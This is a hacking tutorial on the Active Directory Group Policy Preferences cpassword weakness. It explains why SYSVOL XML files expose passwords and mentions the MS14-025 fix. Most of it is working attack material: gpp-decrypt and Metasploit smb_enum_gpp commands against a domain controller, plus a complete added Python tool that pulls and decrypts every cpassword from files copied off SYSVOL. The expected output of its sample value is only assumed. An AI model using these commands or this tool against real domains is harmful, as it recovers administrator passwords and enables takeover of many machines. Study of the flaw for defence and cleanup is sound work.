Attacks - Active Directory Hacking

GPP Attack

TL;DR

Group Policy Preferences (GPP) let administrators push local accounts, mapped drives, services and scheduled tasks, complete with passwords, through Group Policy. The password is stored in an XML file in SYSVOL as the cpassword attribute, AES-256 encrypted with a fixed key that Microsoft published in the [MS-GPPREF] specification, and SYSVOL is readable by every authenticated domain user. MS14-025 stopped GPMC from creating new cpassword entries but did not remove existing ones, so domains that still carry pre-2014 policies (2012-era servers, for example) remain exposed. In short: search SYSVOL for cpassword, then decrypt it with gpp-decrypt or let Metasploit's smb_enum_gpp module do both steps at once.

What are Group Policy Preferences (GPP)?

Group Policy Preferences (GPP), introduced with Windows Server 2008, extend Group Policy with settings such as local users and groups, mapped drives, services, scheduled tasks, data sources and printers. Several of these take a password, which the Group Policy Management Console stores in the policy's XML file under SYSVOL as a cpassword attribute. The value is AES-256-CBC encrypted, but the 32-byte key is static and Microsoft published it in the [MS-GPPREF] specification, so the encryption provides no protection at all: anyone who can read the file can recover the password. Since SYSVOL is readable by every authenticated domain user, that is effectively every user in the domain. MS14-025 (May 2014) removed the ability to set passwords through GPMC, but the patch does not delete existing XML files, so older environments (2012 servers, for example) often still contain live credentials. The fix is to delete the affected preference items and rotate every password they exposed.

How it works?

  1. An administrator creates a preference item with a password (typically a local Administrator account deployed to many workstations) in GPMC.
  2. GPMC encrypts the password with AES-256-CBC using the fixed, publicly documented key and writes it base64-encoded into the cpassword attribute of the policy's XML file (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml or Printers.xml).
  3. The file lands in the SYSVOL share on every domain controller, where any authenticated domain user can read it.
  4. An attacker with any domain account reads the file and decrypts cpassword with the public key; no secret is needed.
  5. The attacker now holds the plaintext password for the account named in the file, which is usually valid on every machine the policy applied to.

Demo Time

First we need to find the Groups.xml file. It lives in SYSVOL under a path such as \\lab.local\SYSVOL\lab.local\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml, so the quickest check is to search every XML file under the Policies folder for the string cpassword; the other preference files listed above use the same attribute.

Example of a Groups.xml file with a cpassword value (the userName attribute tells you which account the password belongs to):

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA19A}" name="lab\Administrator" image="2" changed="2023-03-29 10:43:50" uid="{E0917100-75D3-4A9A-A786-62134D6261F0}">
    <Properties action="U" newName="" fullName="" description="" cpassword="encrypted-password-found-here" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="lab\Administrator"/>
  </User>
</Groups>

Then we can decrypt it with gpp-decrypt, which ships with Kali and embeds the published key:

gpp-decrypt <the-cpassword-value-found-in-the-file>

Or we can let the Metasploit smb_enum_gpp module do the whole job: it connects to SYSVOL over SMB with any domain account, walks every policy, and prints the decrypted cpassword values. RHOSTS should point at a domain controller, since that is what hosts SYSVOL:

msfconsole
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS 192.168.1.100
set SMBDomain lab.local
set SMBUser user
set SMBPass password
run
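What gpp-decrypt and smb_enum_gpp do under the hood, as an added example that is not part of the original page or of either tool: parse a preference XML file, pull out every cpassword, restore the base64 padding GPP strips, decrypt with AES-256-CBC under the published key and an all-zero IV, drop the PKCS#7 padding and decode the UTF-16LE plaintext. AES is implemented in pure Python so the script runs with no third-party modules; the sample Groups.xml is constructed, and its cpassword is the widely circulated sample value, assumed here to decrypt to "Local*P4ssword!".

```python
import base64
import xml.etree.ElementTree as ET

# Fixed AES-256 key Microsoft published in the [MS-GPPREF] specification.
# Every GPP cpassword in every domain is encrypted with this same key.
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)


# --- Minimal AES-256 decryption in pure Python ---------------------------
def _xtime(a):
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a


def _gmul(a, b):
    """Multiply two bytes in GF(2^8) with the AES reduction polynomial."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a, b = _xtime(a), b >> 1
    return r


def _build_sbox():
    inv = [0] * 256
    for a in range(1, 256):
        inv[a] = next(b for b in range(1, 256) if _gmul(a, b) == 1)
    sbox = []
    for x in range(256):
        i = s = inv[x]
        for _ in range(4):  # affine transform: x ^ rotl(x,1..4) ^ 0x63
            i = ((i << 1) | (i >> 7)) & 0xFF
            s ^= i
        sbox.append(s ^ 0x63)
    return sbox


SBOX = _build_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]
INV_MIX = [[14, 11, 13, 9], [9, 14, 11, 13], [13, 9, 14, 11], [11, 13, 9, 14]]


def _expand_key(key):
    """FIPS-197 key schedule; returns Nr+1 round keys of 16 bytes each."""
    nk, nr = len(key) // 4, len(key) // 4 + 6
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    rcon = 1
    for i in range(nk, 4 * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]
        w.append([x ^ y for x, y in zip(w[i - nk], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(nr + 1)]


def _aes_decrypt_block(round_keys, block):
    """Inverse cipher on one 16-byte block (state kept column-major)."""
    xor = lambda s, k: [a ^ b for a, b in zip(s, k)]
    inv_shift = lambda s: [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]
    s = xor(block, round_keys[-1])
    for rnd in range(len(round_keys) - 2, 0, -1):
        s = xor([INV_SBOX[b] for b in inv_shift(s)], round_keys[rnd])
        s = [_gmul(s[4 * c], m[0]) ^ _gmul(s[4 * c + 1], m[1])
             ^ _gmul(s[4 * c + 2], m[2]) ^ _gmul(s[4 * c + 3], m[3])
             for c in range(4) for m in INV_MIX]
    return bytes(xor([INV_SBOX[b] for b in inv_shift(s)], round_keys[0]))


# --- The GPP-specific part -----------------------------------------------
def decrypt_cpassword(cpassword):
    """Turn a cpassword attribute value into the plaintext password."""
    # GPP strips the base64 '=' padding; restore it before decoding.
    ciphertext = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    if not ciphertext or len(ciphertext) % 16:
        raise ValueError("cpassword is not a whole number of AES blocks")
    round_keys = _expand_key(GPP_KEY)
    prev, plain = bytes(16), b""  # CBC mode with an all-zero IV
    for i in range(0, len(ciphertext), 16):
        block = ciphertext[i:i + 16]
        plain += bytes(x ^ y for x, y in zip(_aes_decrypt_block(round_keys, block), prev))
        prev = block
    plain = plain[:-plain[-1]]  # strip PKCS#7 padding
    return plain.decode("utf-16-le")  # GPP stores the password as UTF-16LE


def extract_cpasswords(xml_text):
    """Return (account, cpassword) pairs from any GPP preference XML file."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    pairs = []
    for el in root.iter("Properties"):
        if el.get("cpassword"):
            # Account attribute differs per file type: Groups/Drives/Printers use
            # userName, Services use accountName, ScheduledTasks runAs, DataSources username.
            account = next((el.get(a) for a in ("userName", "accountName", "runAs", "username")
                            if el.get(a)), "")
            pairs.append((account, el.get("cpassword")))
    return pairs


def dump_gpp_file(xml_text):
    """Parse one preference file and decrypt every cpassword it contains."""
    return [(acct, decrypt_cpassword(cp)) for acct, cp in extract_cpasswords(xml_text)]


# Constructed sample in the Groups.xml layout shown above; the cpassword is the
# widely published sample value (assumed to decrypt to "Local*P4ssword!").
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA19A}" name="lab\\Administrator" image="2" changed="2023-03-29 10:43:50" uid="{E0917100-75D3-4A9A-A786-62134D6261F0}">
    <Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="lab\\Administrator"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for account, password in dump_gpp_file(SAMPLE_GROUPS_XML):
        print(f"{account}: {password}")
```

Point dump_gpp_file at the contents of any *.xml found under SYSVOL\...\Policies (mount the share or copy the files over SMB first); the length check matters because a truncated or hand-edited cpassword would otherwise decrypt to garbage silently.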